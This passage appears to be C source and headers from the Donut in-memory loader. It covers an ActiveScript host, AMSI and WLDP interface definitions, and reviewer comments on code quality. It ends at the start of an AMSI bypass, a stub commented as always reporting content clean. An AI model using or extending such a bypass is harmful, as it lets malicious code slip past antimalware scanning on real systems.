133 hr = scriptError->lpVtbl->GetExceptionInfo(scriptError, &ei);
134 if(hr == S_OK) {
135 DPRINT("IActiveScriptError::GetSourcePosition");
136 hr = scriptError->lpVtbl->GetSourcePosition(
137 scriptError, &dwSourceContext,
138 &ulLineNumber, &ichCharPosition);
139 if(hr == S_OK) {
140 DPRINT("JSError: %ws line[%d:%d]\n",
141 ei.bstrDescription, ulLineNumber, ichCharPosition);
142 }
143 }
144 return S_OK;
145 }
146
147 static STDMETHODIMP ActiveScript_GetLCID(IActiveScriptSite *this, LCID *plcid) {
148 DPRINT("IActiveScriptSite::GetLCID");
149 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
150
151 *plcid = mas->inst->api.GetUserDefaultLCID();
152 return S_OK;
153 }
154
155 static STDMETHODIMP ActiveScript_GetDocVersionString(IActiveScriptSite *this, BSTR *version) {
156 DPRINT("IActiveScriptSite::GetDocVersionString");
157
158 return S_OK;
159 }
160
161 static STDMETHODIMP ActiveScript_OnScriptTerminate(IActiveScriptSite *this,
162 const VARIANT *pvr, const EXCEPINFO *pei)
163 {
164 DPRINT("IActiveScriptSite::OnScriptTerminate");
165
166 return S_OK;
167 }
168
169 static STDMETHODIMP ActiveScript_OnStateChange(IActiveScriptSite *this, SCRIPTSTATE state) {
170 DPRINT("IActiveScriptSite::OnStateChange");
171
172 return S_OK;
173 }
174
175 static STDMETHODIMP ActiveScript_OnEnterScript(IActiveScriptSite *this) {
176 DPRINT("IActiveScriptSite::OnEnterScript");
177
178 return S_OK;
179 }
180
181 static STDMETHODIMP ActiveScript_OnLeaveScript(IActiveScriptSite *this) {
182 DPRINT("IActiveScriptSite::OnLeaveScript");
183
184 return S_OK;
185 }
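Review bot: ActiveScript_GetDocVersionString returns S_OK without writing its `BSTR *version` out-parameter, so an engine honouring the IActiveScriptSite contract may read an uninitialised BSTR and later try to free it; either set it explicitly, `if(version == NULL) return E_POINTER; *version = NULL;`, or return E_NOTIMPL as a host with no document versioning would. ActiveScript_GetLCID has the mirror-image gap: it dereferences `plcid` without the E_POINTER check that QueryInterface and GetItemInfo in the same file perform. In ActiveScript_AddRef the value returned is a fresh read of `mas->site.m_cRef` after the interlocked increment, so a concurrent Release can make it stale; `return _InterlockedIncrement(&mas->site.m_cRef);` mirrors what ActiveScript_Release already does. The BSTR members that GetExceptionInfo fills in inside ActiveScript_OnScriptError are, by COM convention, owned by the caller and are never released here, which leaks them on every script error — presumably acceptable for a short-lived engine, but a comment stating that the omission is deliberate would help.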
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef IACTIVESCRIPT_H
32 #define IACTIVESCRIPT_H
33
34 #include "../include/donut.h"
35
36 // required to load and run VBS or JS files
37 typedef struct _IActiveScript IActiveScript;
38 typedef struct _IActiveScriptError IActiveScriptError;
39 typedef struct _IActiveScriptSite IActiveScriptSite;
40 typedef struct _IActiveScriptSiteWindow IActiveScriptSiteWindow;
41 typedef struct _IActiveScriptParse32 IActiveScriptParse32;
42 typedef struct _IActiveScriptParse64 IActiveScriptParse64;
43
44 typedef enum tagSCRIPTSTATE {
45 SCRIPTSTATE_UNINITIALIZED = 0,
46 SCRIPTSTATE_STARTED = 1,
47 SCRIPTSTATE_CONNECTED = 2,
48 SCRIPTSTATE_DISCONNECTED = 3,
49 SCRIPTSTATE_CLOSED = 4,
50 SCRIPTSTATE_INITIALIZED = 5
51 } SCRIPTSTATE;
52
53 typedef enum tagSCRIPTTHREADSTATE {
54 SCRIPTTHREADSTATE_NOTINSCRIPT = 0,
55 SCRIPTTHREADSTATE_RUNNING = 1
56 } SCRIPTTHREADSTATE;
57
58 #define SCRIPTTHREADID_CURRENT 0xFFFFFFFD // The currently executing thread.
59 #define SCRIPTTHREADID_BASE 0xFFFFFFFE // The base thread; that is, the thread in which the scripting engine was instantiated.
60 #define SCRIPTTHREADID_ALL 0xFFFFFFFF // All threads.
61
62 typedef DWORD SCRIPTTHREADID;
63
64 #define SCRIPTITEM_ISPERSISTENT 0x00000001
65 #define SCRIPTITEM_ISVISIBLE 0x00000002
66 #define SCRIPTITEM_ISSOURCE 0x00000004
67 #define SCRIPTITEM_GLOBALMEMBERS 0x00000008
68 #define SCRIPTITEM_EXISTS 0x00000080
69 #define SCRIPTITEM_MULTIINSTANCE 0x00000100
70 #define SCRIPTITEM_CODEONLY 0x00000200
71
72 #define SCRIPTTEXT_ISPERSISTENT 0x00000001
73 #define SCRIPTTEXT_ISVISIBLE 0x00000002
74 #define SCRIPTTEXT_ISEXPRESSION 0x00000020
75 #define SCRIPTTEXT_KEEPDEFINITIONS 0x00000040
76 #define SCRIPTTEXT_ALLOWEXECUTION 0x00000400
77 #define SCRIPTTEXT_ALL_FLAGS (SCRIPTTEXT_ISPERSISTENT | \
78 SCRIPTTEXT_ISVISIBLE | \
79 SCRIPTTEXT_ISEXPRESSION | \
80 SCRIPTTEXT_KEEPDEFINITIONS | \
81 SCRIPTTEXT_ALLOWEXECUTION)
82
83 #define SCRIPTTEXT_HOSTMANAGESSOURCE 0x00000080
84 #define SCRIPTINFO_IUNKNOWN 0x00000001
85 #define SCRIPTINFO_ITYPEINFO 0x00000002
86 #define SCRIPTINFO_ALL_FLAGS (SCRIPTINFO_IUNKNOWN | SCRIPTINFO_ITYPEINFO)
87
88 typedef struct IActiveScriptVtbl {
89 BEGIN_INTERFACE
90
91 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
92 IActiveScript * This,
93 /* [in] */ REFIID riid,
94 /* [annotation][iid_is][out] */
95 void **ppvObject);
96
97 ULONG ( STDMETHODCALLTYPE *AddRef )(
98 IActiveScript * This);
99
100 ULONG ( STDMETHODCALLTYPE *Release )(
101 IActiveScript * This);
102
103 HRESULT ( STDMETHODCALLTYPE *SetScriptSite )(
104 IActiveScript * This,
105 /* [in] */ IActiveScriptSite *pass);
106
107 HRESULT ( STDMETHODCALLTYPE *GetScriptSite )(
108 IActiveScript * This,
109 /* [in] */ REFIID riid,
110 /* [iid_is][out] */ void **ppvObject);
111
112 HRESULT ( STDMETHODCALLTYPE *SetScriptState )(
113 IActiveScript * This,
114 /* [in] */ SCRIPTSTATE ss);
115
116 HRESULT ( STDMETHODCALLTYPE *GetScriptState )(
117 IActiveScript * This,
118 /* [out] */ SCRIPTSTATE *pssState);
119
120 HRESULT ( STDMETHODCALLTYPE *Close )(
121 IActiveScript * This);
122
123 HRESULT ( STDMETHODCALLTYPE *AddNamedItem )(
124 IActiveScript * This,
125 /* [in] */ LPCOLESTR pstrName,
126 /* [in] */ DWORD dwFlags);
127
128 HRESULT ( STDMETHODCALLTYPE *AddTypeLib )(
129 IActiveScript * This,
130 /* [in] */ REFGUID rguidTypeLib,
131 /* [in] */ DWORD dwMajor,
132 /* [in] */ DWORD dwMinor,
133 /* [in] */ DWORD dwFlags);
134
135 HRESULT ( STDMETHODCALLTYPE *GetScriptDispatch )(
136 IActiveScript * This,
137 /* [in] */ LPCOLESTR pstrItemName,
138 /* [out] */ IDispatch **ppdisp);
139
140 HRESULT ( STDMETHODCALLTYPE *GetCurrentScriptThreadID )(
141 IActiveScript * This,
142 /* [out] */ SCRIPTTHREADID *pstidThread);
143
144 HRESULT ( STDMETHODCALLTYPE *GetScriptThreadID )(
145 IActiveScript * This,
146 /* [in] */ DWORD dwWin32ThreadId,
147 /* [out] */ SCRIPTTHREADID *pstidThread);
148
149 HRESULT ( STDMETHODCALLTYPE *GetScriptThreadState )(
150 IActiveScript * This,
151 /* [in] */ SCRIPTTHREADID stidThread,
152 /* [out] */ SCRIPTTHREADSTATE *pstsState);
153
154 HRESULT ( STDMETHODCALLTYPE *InterruptScriptThread )(
155 IActiveScript * This,
156 /* [in] */ SCRIPTTHREADID stidThread,
157 /* [in] */ const EXCEPINFO *pexcepinfo,
158 /* [in] */ DWORD dwFlags);
159
160 HRESULT ( STDMETHODCALLTYPE *Clone )(
161 IActiveScript * This,
162 /* [out] */ IActiveScript **ppscript);
163
164 END_INTERFACE
165 } IActiveScriptVtbl;
166
167 typedef struct _IActiveScript {
168 IActiveScriptVtbl *lpVtbl;
169 } ActiveScript;
170
171 typedef struct IActiveScriptParse32Vtbl {
172 BEGIN_INTERFACE
173
174 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
175 IActiveScriptParse32 * This,
176 /* [in] */ REFIID riid,
177 /* [annotation][iid_is][out] */
178 void **ppvObject);
179
180 ULONG ( STDMETHODCALLTYPE *AddRef )(
181 IActiveScriptParse32 * This);
182
183 ULONG ( STDMETHODCALLTYPE *Release )(
184 IActiveScriptParse32 * This);
185
186 HRESULT ( STDMETHODCALLTYPE *InitNew )(
187 IActiveScriptParse32 * This);
188
189 HRESULT ( STDMETHODCALLTYPE *AddScriptlet )(
190 IActiveScriptParse32 * This,
191 /* [in] */ LPCOLESTR pstrDefaultName,
192 /* [in] */ LPCOLESTR pstrCode,
193 /* [in] */ LPCOLESTR pstrItemName,
194 /* [in] */ LPCOLESTR pstrSubItemName,
195 /* [in] */ LPCOLESTR pstrEventName,
196 /* [in] */ LPCOLESTR pstrDelimiter,
197 /* [in] */ DWORD dwSourceContextCookie,
198 /* [in] */ ULONG ulStartingLineNumber,
199 /* [in] */ DWORD dwFlags,
200 /* [out] */ BSTR *pbstrName,
201 /* [out] */ EXCEPINFO *pexcepinfo);
202
203 HRESULT ( STDMETHODCALLTYPE *ParseScriptText )(
204 IActiveScriptParse32 * This,
205 /* [in] */ LPCOLESTR pstrCode,
206 /* [in] */ LPCOLESTR pstrItemName,
207 /* [in] */ IUnknown *punkContext,
208 /* [in] */ LPCOLESTR pstrDelimiter,
209 /* [in] */ DWORD dwSourceContextCookie,
210 /* [in] */ ULONG ulStartingLineNumber,
211 /* [in] */ DWORD dwFlags,
212 /* [out] */ VARIANT *pvarResult,
213 /* [out] */ EXCEPINFO *pexcepinfo);
214
215 END_INTERFACE
216 } IActiveScriptParse32Vtbl;
217
218 typedef struct _IActiveScriptParse32 {
219 IActiveScriptParse32Vtbl *lpVtbl;
220 } ActiveScriptParse32;
221
222 typedef struct IActiveScriptParse64Vtbl {
223 BEGIN_INTERFACE
224
225 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
226 IActiveScriptParse64 * This,
227 /* [in] */ REFIID riid,
228 /* [annotation][iid_is][out] */
229 void **ppvObject);
230
231 ULONG ( STDMETHODCALLTYPE *AddRef )(
232 IActiveScriptParse64 * This);
233
234 ULONG ( STDMETHODCALLTYPE *Release )(
235 IActiveScriptParse64 * This);
236
237 HRESULT ( STDMETHODCALLTYPE *InitNew )(
238 IActiveScriptParse64 * This);
239
240 HRESULT ( STDMETHODCALLTYPE *AddScriptlet )(
241 IActiveScriptParse64 *This,
242 /* [in] */ LPCOLESTR pstrDefaultName,
243 /* [in] */ LPCOLESTR pstrCode,
244 /* [in] */ LPCOLESTR pstrItemName,
245 /* [in] */ LPCOLESTR pstrSubItemName,
246 /* [in] */ LPCOLESTR pstrEventName,
247 /* [in] */ LPCOLESTR pstrDelimiter,
248 /* [in] */ DWORDLONG dwSourceContextCookie,
249 /* [in] */ ULONG ulStartingLineNumber,
250 /* [in] */ DWORD dwFlags,
251 /* [out] */ BSTR *pbstrName,
252 /* [out] */ EXCEPINFO *pexcepinfo);
253
254 HRESULT ( STDMETHODCALLTYPE *ParseScriptText )(
255 IActiveScriptParse64 *This,
256 /* [in] */ LPCOLESTR pstrCode,
257 /* [in] */ LPCOLESTR pstrItemName,
258 /* [in] */ IUnknown *punkContext,
259 /* [in] */ LPCOLESTR pstrDelimiter,
260 /* [in] */ DWORDLONG dwSourceContextCookie,
261 /* [in] */ ULONG ulStartingLineNumber,
262 /* [in] */ DWORD dwFlags,
263 /* [out] */ VARIANT *pvarResult,
264 /* [out] */ EXCEPINFO *pexcepinfo);
265
266 END_INTERFACE
267 } IActiveScriptParse64Vtbl;
268
269 typedef struct _IActiveScriptParse64 {
270 IActiveScriptParse64Vtbl *lpVtbl;
271 } ActiveScriptParse64;
272
273 typedef struct _IActiveScriptSiteWindowVtbl {
274 BEGIN_INTERFACE
275
276 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
277 IActiveScriptSiteWindow * This,
278 /* [in] */ REFIID riid,
279 /* [annotation][iid_is][out] */
280 void **ppvObject);
281
282 ULONG ( STDMETHODCALLTYPE *AddRef )(
283 IActiveScriptSiteWindow * This);
284
285 ULONG ( STDMETHODCALLTYPE *Release )(
286 IActiveScriptSiteWindow * This);
287
288 HRESULT ( STDMETHODCALLTYPE *GetWindow )(
289 IActiveScriptSiteWindow * This,
290 /* [out] */ HWND *phwnd);
291
292 HRESULT ( STDMETHODCALLTYPE *EnableModeless )(
293 IActiveScriptSiteWindow * This,
294 /* [in] */ BOOL fEnable);
295
296 END_INTERFACE
297 } IActiveScriptSiteWindowVtbl;
298
299 typedef struct _IActiveScriptSiteWindow {
300 IActiveScriptSiteWindowVtbl *lpVtbl;
301 } ActiveScriptSiteWindow;
302
303 typedef struct _IActiveScriptErrorVtbl {
304 BEGIN_INTERFACE
305
306 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
307 IActiveScriptError * This,
308 /* [in] */ REFIID riid,
309 /* [annotation][iid_is][out] */
310 void **ppvObject);
311
312 ULONG ( STDMETHODCALLTYPE *AddRef )(
313 IActiveScriptError * This);
314
315 ULONG ( STDMETHODCALLTYPE *Release )(
316 IActiveScriptError * This);
317
318 /* [local] */ HRESULT ( STDMETHODCALLTYPE *GetExceptionInfo )(
319 IActiveScriptError * This,
320 /* [out] */ EXCEPINFO *pexcepinfo);
321
322 HRESULT ( STDMETHODCALLTYPE *GetSourcePosition )(
323 IActiveScriptError * This,
324 /* [out] */ DWORD *pdwSourceContext,
325 /* [out] */ ULONG *pulLineNumber,
326 /* [out] */ LONG *plCharacterPosition);
327
328 HRESULT ( STDMETHODCALLTYPE *GetSourceLineText )(
329 IActiveScriptError * This,
330 /* [out] */ BSTR *pbstrSourceLine);
331
332 END_INTERFACE
333 } IActiveScriptErrorVtbl;
334
335 typedef struct _IActiveScriptError {
336 IActiveScriptErrorVtbl *lpVtbl;
337 } ActiveScriptError;
338
339 typedef struct _IActiveScriptSiteVtbl {
340 BEGIN_INTERFACE
341
342 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
343 IActiveScriptSite * This,
344 /* [in] */ REFIID riid,
345 /* [annotation][iid_is][out] */
346 void **ppvObject);
347
348 ULONG ( STDMETHODCALLTYPE *AddRef )(
349 IActiveScriptSite * This);
350
351 ULONG ( STDMETHODCALLTYPE *Release )(
352 IActiveScriptSite * This);
353
354 HRESULT ( STDMETHODCALLTYPE *GetLCID )(
355 IActiveScriptSite * This,
356 /* [out] */ LCID *plcid);
357
358 HRESULT ( STDMETHODCALLTYPE *GetItemInfo )(
359 IActiveScriptSite * This,
360 /* [in] */ LPCOLESTR pstrName,
361 /* [in] */ DWORD dwReturnMask,
362 /* [out] */ IUnknown **ppiunkItem,
363 /* [out] */ ITypeInfo **ppti);
364
365 HRESULT ( STDMETHODCALLTYPE *GetDocVersionString )(
366 IActiveScriptSite * This,
367 /* [out] */ BSTR *pbstrVersion);
368
369 HRESULT ( STDMETHODCALLTYPE *OnScriptTerminate )(
370 IActiveScriptSite * This,
371 /* [in] */ const VARIANT *pvarResult,
372 /* [in] */ const EXCEPINFO *pexcepinfo);
373
374 HRESULT ( STDMETHODCALLTYPE *OnStateChange )(
375 IActiveScriptSite * This,
376 /* [in] */ SCRIPTSTATE ssScriptState);
377
378 HRESULT ( STDMETHODCALLTYPE *OnScriptError )(
379 IActiveScriptSite * This,
380 /* [in] */ IActiveScriptError *pscripterror);
381
382 HRESULT ( STDMETHODCALLTYPE *OnEnterScript )(
383 IActiveScriptSite * This);
384
385 HRESULT ( STDMETHODCALLTYPE *OnLeaveScript )(
386 IActiveScriptSite * This);
387
388 END_INTERFACE
389 } IActiveScriptSiteVtbl;
390
391 typedef struct _IActiveScriptSite {
392 IActiveScriptSiteVtbl *lpVtbl;
393 ULONG m_cRef; // reference count (not part of original definition of course)
394 } ActiveScriptSite;
395
396 #ifdef _WIN64
397 #define IActiveScriptParse IActiveScriptParse64
398 #define IID_IActiveScriptParse IID_IActiveScriptParse64
399 #else
400 #define IActiveScriptParse IActiveScriptParse32
401 #define IID_IActiveScriptParse IID_IActiveScriptParse32
402 #endif
403
404 static VOID ActiveScript_New(PDONUT_INSTANCE inst, IActiveScriptSite *this);
405
406 static STDMETHODIMP ActiveScript_QueryInterface(IActiveScriptSite *this, REFIID riid, void **ppv);
407 static STDMETHODIMP_(ULONG) ActiveScript_AddRef(IActiveScriptSite *this);
408 static STDMETHODIMP_(ULONG) ActiveScript_Release(IActiveScriptSite *this);
409
410 // Informs the host that the scripting engine has begun executing the script code.
411 static STDMETHODIMP ActiveScript_OnEnterScript(IActiveScriptSite *this);
412
413 // Informs the host that the scripting engine has returned from executing script code.
414 static STDMETHODIMP ActiveScript_OnLeaveScript(IActiveScriptSite *this);
415
416 // Retrieves the locale identifier that the host uses for displaying user-interface elements.
417 static STDMETHODIMP ActiveScript_GetLCID(IActiveScriptSite *this, LCID *lcid);
418
419 // Retrieves a host-defined string that uniquely identifies the current document version from the host's point of view.
420 static STDMETHODIMP ActiveScript_GetDocVersionString(IActiveScriptSite *this, BSTR *version);
421
422 // Informs the host that an execution error occurred while the engine was running the script.
423 static STDMETHODIMP ActiveScript_OnScriptError(IActiveScriptSite *this, IActiveScriptError *scriptError);
424
425 // Informs the host that the scripting engine has changed states.
426 static STDMETHODIMP ActiveScript_OnStateChange(IActiveScriptSite *this, SCRIPTSTATE state);
427
428 // Obtains information about an item that was added to an engine through a call to the IActiveScript::AddNamedItem method.
429 static STDMETHODIMP ActiveScript_GetItemInfo(IActiveScriptSite *this, LPCOLESTR objectName, DWORD dwReturnMask, IUnknown **objPtr, ITypeInfo **typeInfo);
430
431 // Called when the script has completed execution.
432 static STDMETHODIMP ActiveScript_OnScriptTerminate(IActiveScriptSite *this, const VARIANT *pvr, const EXCEPINFO *pei);
433
434 #endif
435
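Review bot: `m_cRef` in the `_IActiveScriptSite` definition is declared `ULONG`, while the implementation passes `&mas->site.m_cRef` to `_InterlockedIncrement`/`_InterlockedDecrement`, whose parameter is `LONG volatile *`; that pointer-type mismatch is a constraint violation compilers typically only warn about, and declaring the field `volatile LONG m_cRef;` removes it without a cast. The comment on that field could also record ownership, since Release never frees the object when the count reaches zero and the site appears to be embedded in the enclosing MyIActiveScriptSite rather than heap-allocated: `// reference count; the site is embedded, so Release never frees this object`. The prototype parameter names here (`lcid`, `typeInfo`) differ from the definitions (`plcid`, `ppti`); harmless, but aligning them keeps the header usable as documentation.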
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef AMSI_H
32 #define AMSI_H
33
34 #include <windows.h>
35
36 DECLARE_HANDLE(HAMSICONTEXT);
37 DECLARE_HANDLE(HAMSISESSION);
38
39 typedef struct _IAmsiStream IAmsiStream;
40 typedef struct _IAntimalware IAntimalware;
41 typedef struct _IAntimalwareProvider IAntimalwareProvider;
42
43 typedef enum tagAMSI_RESULT {
44 // No detection found. Result likely not going to change after future definition update.
45 // a.k.a. known good
46 AMSI_RESULT_CLEAN = 0,
47 // No detection found. Result might change after future definition update.
48 AMSI_RESULT_NOT_DETECTED = 1,
49 // Detection found. It is recommended to abort executing the content if it is executable, e.g. a script.
50 // Return result of 1 - 32767 is estimated risk level that an antimalware provider might indicate.
51 // The large the result, the riskier to continue.
52 // Any return result equal to or larger than 32768 is consider malware and should be blocked.
53 // These values are provider specific, and may indicate malware family or ID.
54 // An application should use AmsiResultIsMalware() to determine whether the content should be blocked.
55 AMSI_RESULT_DETECTED = 32768,
56 } AMSI_RESULT;
57
58 typedef enum tagAMSI_ATTRIBUTE {
59 // Name/version/GUID string of the calling application.
60 AMSI_ATTRIBUTE_APP_NAME = 0,
61 // LPWSTR, filename, URL, script unique id etc.
62 AMSI_ATTRIBUTE_CONTENT_NAME = 1,
63 // ULONGLONG, size of the input. Mandatory.
64 AMSI_ATTRIBUTE_CONTENT_SIZE = 2,
65 // PVOID, memory address if content is fully loaded in memory. Mandatory unless
66 // Read() is implemented instead to support on-demand content retrieval.
67 AMSI_ATTRIBUTE_CONTENT_ADDRESS = 3,
68 // PVOID, session is used to associate different scan calls, e.g. if the contents
69 // to be scanned belong to the sample original script. Return nullptr if content
70 // is self-contained. Mandatory.
71 AMSI_ATTRIBUTE_SESSION = 4,
72 } AMSI_ATTRIBUTE;
73
74 typedef struct IAmsiStreamVtbl {
75 BEGIN_INTERFACE
76
77 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
78 IAmsiStream * This,
79 REFIID riid,
80 void **ppvObject);
81
82 ULONG ( STDMETHODCALLTYPE *AddRef )(
83 IAmsiStream * This);
84
85 ULONG ( STDMETHODCALLTYPE *Release )(
86 IAmsiStream * This);
87
88 HRESULT ( STDMETHODCALLTYPE *GetAttribute )(
89 IAmsiStream * This,
90 AMSI_ATTRIBUTE attribute,
91 ULONG dataSize,
92 unsigned char *data,
93 ULONG *retData);
94
95 HRESULT ( STDMETHODCALLTYPE *Read )(
96 IAmsiStream * This,
97 ULONGLONG position,
98 ULONG size,
99 unsigned char *buffer,
100 ULONG *readSize);
101
102 END_INTERFACE
103 } IAmsiStreamVtbl;
104
105 typedef struct _IAmsiStream {
106 IAmsiStreamVtbl *lpVtbl;
107 } AmsiStream;
108
109 typedef struct IAntimalwareProviderVtbl {
110 BEGIN_INTERFACE
111
112 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
113 IAntimalwareProvider * This,
114 REFIID riid,
115 void **ppvObject);
116
117 ULONG ( STDMETHODCALLTYPE *AddRef )(
118 IAntimalwareProvider * This);
119
120 ULONG ( STDMETHODCALLTYPE *Release )(
121 IAntimalwareProvider * This);
122
123 HRESULT ( STDMETHODCALLTYPE *Scan )(
124 IAntimalwareProvider * This,
125 IAmsiStream *stream,
126 AMSI_RESULT *result);
127
128 void ( STDMETHODCALLTYPE *CloseSession )(
129 IAntimalwareProvider * This,
130 ULONGLONG session);
131
132 HRESULT ( STDMETHODCALLTYPE *DisplayName )(
133 IAntimalwareProvider * This,
134 LPWSTR *displayName);
135
136 END_INTERFACE
137 } IAntimalwareProviderVtbl;
138
139 typedef struct _IAntimalwareProvider {
140 IAntimalwareProviderVtbl *lpVtbl;
141 } AntimalwareProvider;
142
143 typedef struct IAntimalwareVtbl {
144 BEGIN_INTERFACE
145
146 HRESULT ( STDMETHODCALLTYPE *QueryInterface)(
147 IAntimalware *This,
148 REFIID riid,
149 void **ppvObject);
150
151 ULONG ( STDMETHODCALLTYPE *AddRef )(
152 IAntimalware * This);
153
154 ULONG ( STDMETHODCALLTYPE *Release )(
155 IAntimalware * This);
156
157 HRESULT ( STDMETHODCALLTYPE *Scan )(
158 IAntimalware * This,
159 IAmsiStream *stream,
160 AMSI_RESULT *result,
161 IAntimalwareProvider **provider);
162
163 void ( STDMETHODCALLTYPE *CloseSession )(
164 IAntimalware * This,
165 ULONGLONG session);
166
167 END_INTERFACE
168 } IAntimalwareVtbl;
169
170 typedef struct _IAntimalware {
171 IAntimalwareVtbl *lpVtbl;
172 } Antimalware;
173
174 typedef struct tagHAMSICONTEXT {
175 DWORD Signature; // "AMSI" or 0x49534D41
176 PWCHAR AppName; // set by AmsiInitialize
177 IAntimalware *Antimalware; // set by AmsiInitialize
178 DWORD SessionCount; // increased by AmsiOpenSession
179 } _HAMSICONTEXT, *_PHAMSICONTEXT;
180
181 #endif
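Review bot: `tagHAMSICONTEXT` is typedef'd as `_HAMSICONTEXT` and `_PHAMSICONTEXT`; identifiers beginning with an underscore followed by an uppercase letter are reserved for the implementation in C, so these should be renamed even though they currently compile. The member comments say what sets each field but not that this is evidently not a public definition (its members are annotated as set by AmsiInitialize and AmsiOpenSession); a header comment such as `// Internal layout behind HAMSICONTEXT; not a documented structure, so the field offsets may change between Windows builds` would warn maintainers before they rely on the offsets. The `AMSI_RESULT` comments also carry typos (`The large the result`, `is consider malware`) worth fixing in passing.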
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 typedef enum _WLDP_HOST_ID {
32 WLDP_HOST_ID_UNKNOWN = 0,
33 WLDP_HOST_ID_GLOBAL = 1,
34 WLDP_HOST_ID_VBA = 2,
35 WLDP_HOST_ID_WSH = 3,
36 WLDP_HOST_ID_POWERSHELL = 4,
37 WLDP_HOST_ID_IE = 5,
38 WLDP_HOST_ID_MSI = 6,
39 WLDP_HOST_ID_MAX = 7
40 } WLDP_HOST_ID, *PWLDP_HOST_ID;
41
42 typedef struct _WLDP_HOST_INFORMATION {
43 DWORD dwRevision;
44 WLDP_HOST_ID dwHostId;
45 PCWSTR szSource;
46 HANDLE hSource;
47 } WLDP_HOST_INFORMATION, *PWLDP_HOST_INFORMATION;
48
49 #if defined(BYPASS_AMSI_A)
50
51 // fake function that always returns S_OK and AMSI_RESULT_CLEAN
52 HRESULT WINAPI AmsiScanBufferStub(
